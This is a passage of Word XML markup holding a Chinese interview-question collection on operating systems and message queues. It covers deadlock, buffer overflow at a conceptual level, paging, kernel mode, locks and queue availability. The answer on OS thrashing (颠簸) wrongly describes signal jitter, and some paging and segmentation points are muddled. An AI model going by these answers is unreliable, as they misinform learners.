          <w:numId w:val="33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重新分配资源：当系统发生死锁时，可以重新分配资源，即重新分配被占用的资源，从而打破死锁状态。重新分配资源需要考虑资源的优先级、分配策略和占用时间等因素，以确保操作的合理性和正确性。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总之，解除死锁需要根据具体情况采取合适的方法和策略，以尽量避免对系统和用户造成不必要的影响。在实际应用中，应该建立完善的死锁检测和恢复机制，及时发现和解决死锁问题，确保系统的稳定运行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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什么是缓冲区溢出？有什么危害？</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缓冲区溢出是指当向一个已满的缓冲区中添加数据时，超出了缓冲区的容量，导致数据溢出缓冲区而覆盖到相邻的内存区域。攻击者可以利用缓冲区溢出漏洞，将恶意代码注入程序的内存空间中，从而执行任意代码或提升权限等操作。</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缓冲区溢出是一种常见的安全漏洞，它可能导致以下危害：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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程序崩溃：当程序遭遇缓冲区溢出攻击时，可能导致程序崩溃或停止运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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执行任意代码：攻击者可以将恶意代码注入缓冲区中，从而执行任意代码，控制系统。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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提升权限：攻击者可以通过缓冲区溢出漏洞，提升程序的权限，获取更高的权限，进而控制整个系统。</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为了防止缓冲区溢出攻击，可以采取以下措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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编写安全的代码：编写安全的代码可以减少缓冲区溢出漏洞的发生。例如，对输入数据进行正确的验证和过滤，使用安全的API函数等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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使用栈保护技术：栈保护技术是一种防止缓冲区溢出攻击的技术，它可以检测缓冲区溢出并防止攻击者执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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使用堆保护技术：堆保护技术是一种防止堆溢出攻击的技术，它可以检测堆溢出并防止攻击者执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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安装更新的补丁：及时安装操作系统和应用程序的更新补丁可以修复已知的缓冲区溢出漏洞，提高系统的安全性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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分页与分段的区别？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分页和分段是操作系统中管理内存的两种常用方式，它们的主要区别在于内存的划分方式和管理机制不同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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分页是将物理内存和逻辑内存分成大小相等的固定大小的块，称为页。每个进程被划分为一组连续的页，进程的逻辑地址空间也被划分为大小相等的页。当进程访问逻辑地址时，操作系统将其转换为物理地址。这个过程称为页表映射，页表将逻辑地址映射到对应的物理地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优点：内存利用率高，内存管理简单，实现容易。</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缺点：内存碎片化，页面置换算法影响性能，由于页大小固定，有内部碎片的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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分段是将逻辑地址空间划分为大小不等的逻辑块，称为段，每个段具有独立的地址空间和属性。段的大小是根据进程的需要来确定的，它们可能代表代码、数据、堆、栈等不同的逻辑块。每个段都有一个段表，段表中存放着每个段的起始地址和长度等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优点：可以更好地管理内存碎片，使得内存利用率更高，可以更好地满足程序的需要。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缺点：内存管理相对复杂，需要支持多种大小的段，并且存在外部碎片的问题。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总的来说，分页和分段都是常用的内存管理方式，它们各自有优缺点，可以根据具体的需求来选择使用哪种方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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物理地址、逻辑地址、虚拟内存的概念</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在计算机系统中，有三种不同的地址概念，分别是物理地址、逻辑地址和虚拟地址。它们的含义如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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物理地址：物理地址是指计算机中内存模块中的实际物理位置。在计算机系统中，每个内存单元都有一个唯一的物理地址，由硬件设备提供。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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逻辑地址：逻辑地址是指应用程序中使用的地址，它是相对于应用程序本身的地址，与物理地址没有直接的联系。在编写应用程序时，程序员使用逻辑地址进行操作，而不需要关心物理地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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虚拟地址：虚拟地址是指应用程序中使用的地址，它是相对于虚拟内存的地址，与物理地址也没有直接的联系。虚拟地址是由操作系统提供的一种抽象地址空间，它将物理内存抽象成一段连续的地址空间，并且将每个进程的虚拟地址空间与物理内存进行映射。通过虚拟地址，进程可以访问其所需的内存空间，而不必关心物理内存的实际位置。</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虚拟内存是一种计算机内存管理技术，它将磁盘空间作为虚拟内存空间的扩展，当物理内存不足时，系统会将一部分暂时不需要的数据转移到磁盘上，从而释放物理内存。这种技术可以使多个进程共享物理内存，并且可以有效地管理内存空间，提高内存利用率。虚拟内存的实现需要通过硬件设备和操作系统软件来支持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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页面置换算法有哪些？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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谈谈你对动态链接库和静态链接库的理解？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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外中断和异常有什么区别？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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一个程序从开始运行到结束的完整过程，你能说出来多少？</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一个程序从开始运行到结束的完整过程可以大致分为以下几个步骤：</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编写源代码：程序员使用编程语言编写程序代码，代码中包含了程序的逻辑、数据结构、函数等。</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编译源代码：将源代码转化为可执行文件的过程，包括预处理、编译、汇编和链接等步骤。</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加载程序：操作系统将可执行文件加载到内存中，并为程序分配内存空间。</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执行程序：程序开始执行，根据代码中的逻辑和数据结构完成任务。</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程序调用库函数：程序可能会调用操作系统提供的函数库，比如输入输出函数、网络通信函数等。</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程序读写文件：程序可能会读写文件，包括打开文件、读取文件、写入文件等操作。</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程序和操作系统交互：程序和操作系统交互，比如获取系统时间、申请系统资源等。</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程序发生错误：程序可能会出现错误，比如内存溢出、越界访问、死锁等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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程序结束：程序完成任务后，返回结果并退出运行，释放占用的系统资源。</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以上是一个程序从开始运行到结束的大致过程，其中还包括多线程、进程通信、信号处理、异常处理、性能优化等方面的内容，具体过程会因程序类型、平台、语言等因素而有所不同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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什么是用户态和内核态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用户态和内核态是操作系统中两个不同的运行级别。</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用户态是指操作系统执行用户程序的模式，此时程序只能访问其分配到的内存空间和CPU资源，并不能直接访问系统资源，如硬件设备、内核代码等。在用户态下执行的程序，如果需要访问系统资源，必须通过系统调用来向内核请求相应的服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内核态是指操作系统内核执行自身代码的模式，此时操作系统具有完全的控制权，可以访问所有的系统资源，包括硬件设备、内核代码等。在内核态下执行的程序，可以直接访问系统资源，而不需要通过系统调用来请求服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一个程序执行系统调用时，它会从用户态切换到内核态，让操作系统内核执行相应的服务，并等待服务完成后再从内核态切换回用户态，继续执行程序的下一条指令。这个切换过程涉及到CPU的状态保存和恢复，会带来一定的性能开销。</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用户态和内核态的划分是为了保证操作系统的安全和稳定性。用户程序不能直接访问内核代码和硬件资源，这样可以避免用户程序误操作导致系统崩溃。同时，内核代码也需要保护起来，以避免被恶意程序攻击。通过用户态和内核态的划分，操作系统可以控制用户程序的访问权限，保障系统的安全和稳定性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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用户态和内核态是如何切换的？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在计算机操作系统中，用户态和内核态是两个不同的运行级别。用户态是指应用程序所运行的权限较低的状态，而内核态是指操作系统内核运行的权限较高的状态。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当一个应用程序需要执行操作系统的特权指令时（例如访问硬件设备或进行系统调用），它必须通过一些机制切换到内核态。这个过程叫做系统调用。系统调用的过程大致如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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应用程序通过特殊的指令（例如 INT 指令或 SYSCALL 指令）向操作系统发起请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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操作系统中断应用程序的执行，并将处理器状态保存到内存中的堆栈中，以便在处理完请求后返回应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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操作系统检查请求的类型，并根据需要执行相应的操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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当操作完成后，操作系统将处理器状态从堆栈中恢复，以便应用程序可以继续执行。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这个过程中，应用程序的执行权从用户态切换到内核态，然后再切换回来。这个切换过程需要一定的时间和开销，因此，应该尽量避免过多的系统调用。操作系统也会尽可能地优化系统调用的处理过程，以减少切换的时间和开销。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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进程终止的方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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守护进程、僵尸进程和孤儿进程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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如何避免僵尸进程？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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介绍一下几种典型的锁？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在并发编程中，锁是一种用来控制多个线程访问共享资源的机制，常见的几种典型锁包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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互斥锁（Mutex Lock）：是一种最常见的锁，也是最基本的锁。它在保证同一时刻只有一个线程访问共享资源的基础上，也提供了加锁和解锁的接口。当一个线程加锁成功时，其他线程就必须等待该线程解锁后才能访问共享资源。互斥锁的实现方式有多种，比如基于操作系统的原语、基于CAS操作的自旋锁等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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读写锁（Read-Write Lock）：是一种特殊的锁，允许多个线程同时读取共享资源，但只允许一个线程进行写操作。它通过分别维护读锁和写锁两个锁来实现。当一个线程获取写锁时，其他线程都必须等待该线程释放写锁后才能访问共享资源。读写锁适用于读操作比写操作频繁的场景，可以有效地提高并发度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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自旋锁（Spin Lock）：是一种不会让线程进入睡眠状态的锁，线程会一直忙等待直到锁可用。自旋锁适用于对共享资源的访问时间非常短的场景，因为自旋锁会一直占用CPU，如果访问时间较长，就会浪费CPU资源。自旋锁的实现方式一般基于原子操作或者指令交换。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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条件变量（Condition Variable）：是一种线程间通信机制，用于在共享资源状态发生变化时通知等待该资源的线程。条件变量通常和互斥锁一起使用，线程在等待共享资源时会释放互斥锁，当条件变量被通知时，线程再次尝试获取互斥锁并访问共享资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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信号量（Semaphore）：是一种用于控制对共享资源的访问次数的计数器，当计数器为0时，线程就需要等待，直到其他线程释放资源并将计数器增加。信号量可以用于实现各种同步问题，比如生产者消费者问题、读写问题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这些锁在实际应用中都有广泛的应用，选择合适的锁可以有效地提高并发性能和可靠性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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常见内存分配内存错误</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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内存交换中，被换出的进程保存在哪里？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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原子操作的是如何实现的</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原子操作是指一种不能被中断的操作，即在进行原子操作的过程中，不会有其他进程或线程对该操作进行干扰或修改。实现原子操作通常需要硬件或操作系统提供支持，下面是几种实现原子操作的方式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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原子指令：现代CPU通常提供一些特殊指令，比如“test-and-set”或“compare-and-swap”等，这些指令可以在单个指令中完成读取、修改、写入等操作，从而保证了操作的原子性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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中断禁用：在进行原子操作期间，可以禁用中断，这样其他进程或线程就无法干扰该操作。这种方法需要操作系统的支持，并且会影响系统的性能和可靠性，因为禁用中断会阻止处理器响应硬件中断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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锁：使用锁是一种常见的实现原子操作的方法，可以通过对共享资源加锁，防止其他进程或线程同时访问该资源。常见的锁包括自旋锁、互斥锁等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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无锁算法：无锁算法是一种比较复杂的实现原子操作的方法，其主要思想是使用一些特殊的算法来避免锁的使用，从而提高性能。常见的无锁算法包括CAS算法、引用计数等。</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总的来说，实现原子操作需要硬件和操作系统的支持，同时需要根据具体场景选择合适的方法来实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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抖动你知道是什么吗？它也叫颠簸现象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27" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="both"/>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抖动（Jitter）是指时序信号在传输过程中出现的时间偏差，也可以理解为时序信号的波动或不稳定性。抖动通常由于时钟偏移、网络延迟、处理器负载等因素引起。在音频和视频传输中，抖动会导致声音和图像的卡顿、断续、不同步等问题，影响观感和听感体验。因此，在实时音视频通信系统中，需要采用抖动缓冲、网络抖动估计等技术来减少抖动对传输质量的影响。抖动也被称为颠簸现象，因为它会使信号的波动“颠簸”不定，不符合正常的周期性变化规律。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:left w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:right w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="360" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="27" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FF0C0C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>十一、消息队列与分布式 26 道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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消息队列的基本作用？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消息队列（Message Queue）是一种软件架构模式，它允许应用程序之间通过异步方式传递消息。消息队列的基本作用包括以下几个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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解耦：消息队列将消息的发送者和接收者解耦，发送者不需要知道消息的具体处理方式和接收者的位置，而只需要将消息发送到队列中即可。接收者从队列中获取消息并进行处理，这使得应用程序之间的通信更加松散。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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异步：消息队列的另一个重要作用是异步通信。发送者将消息发送到队列中后即可立即返回，而不需要等待接收者的响应。接收者可以在自己的时间内处理消息，这降低了系统的耦合性并提高了应用程序的性能和可伸缩性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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缓冲：消息队列还可以用作缓冲器，它可以缓冲消息并控制消息的流量，这有助于应用程序之间的数据传输和流量控制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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可靠性：消息队列还可以提高系统的可靠性，因为它们可以处理消息丢失、重复和错误，确保消息的可靠传输和处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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扩展性：由于消息队列的异步和解耦特性，它们可以很容易地扩展到大规模分布式系统中，从而提高系统的可扩展性和可管理性。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总的来说，消息队列提供了一种可靠、高效和可伸缩的通信机制，它是现代分布式应用程序架构中的重要组成部分</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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消息队列的优缺点有哪些？</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消息队列作为一种分布式系统的基础设施，在应用程序架构中具有许多优点和缺点，下面是一些主要的优点和缺点：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优点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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解耦：消息队列通过将应用程序解耦，提高了系统的可维护性和可扩展性。它们允许应用程序异步处理和交换消息，而不需要直接相互通信，从而降低了应用程序之间的耦合度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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可靠性：消息队列可以增加系统的可靠性，因为它们提供了消息的持久性和可靠性传递。如果一个节点失败，消息队列可以将未处理的消息保留下来，并在节点重新上线时重新发送。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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异步：消息队列通过异步处理，可以提高应用程序的性能和可伸缩性。发送方无需等待接收方的响应，从而可以快速处理请求。同时，接收方可以在自己的时间内处理请求，而不会阻塞发送方。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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缓冲：消息队列还可以用作缓冲器，可以在高峰期缓冲请求，从而平衡系统负载和流量，提高系统的可伸缩性和可用性。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缺点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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复杂性：消息队列的实现和管理需要一定的技术和资源，包括消息路由、持久性、可靠性、监控和管理等方面的处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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非实时性：由于消息队列的异步处理，消息传递的时间可能会受到延迟。对于一些对实时性要求较高的应用程序，这可能会导致性能问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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数据一致性：在一些复杂的应用程序中，消息队列可能会导致数据一致性问题。例如，如果一个消息被处理两次，可能会导致数据重复或不一致的情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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成本：消息队列可能需要额外的硬件和软件资源，这可能会增加系统成本。</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总的来说，消息队列作为一种分布式系统的基础设施，在应用程序架构中具有广泛的应用。但是，在选择和实施消息队列时，需要权衡其优缺点并做出适当的决策</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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如何保证消息队列的高可用？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为了保证消息队列的高可用性，可以采取以下几个措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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集群化部署：可以通过将多个消息队列节点组成一个集群，提高消息队列的可用性和可靠性。当一个节点出现故障时，其他节点可以接管它的任务并继续提供服务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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消息持久化：消息队列需要确保消息的可靠性传递。为了达到这个目标，需要将消息持久化到磁盘上，防止消息在节点故障时丢失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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数据备份：对于消息队列的重要数据，需要定期进行备份，以便在发生灾难性故障时进行恢复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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负载均衡：可以使用负载均衡器来分配消息队列的流量，确保每个节点都可以平衡地处理请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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监控和报警：需要对消息队列进行实时监控，及时发现和处理问题。可以设置监控指标和警报机制，例如队列长度、处理延迟和错误率等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
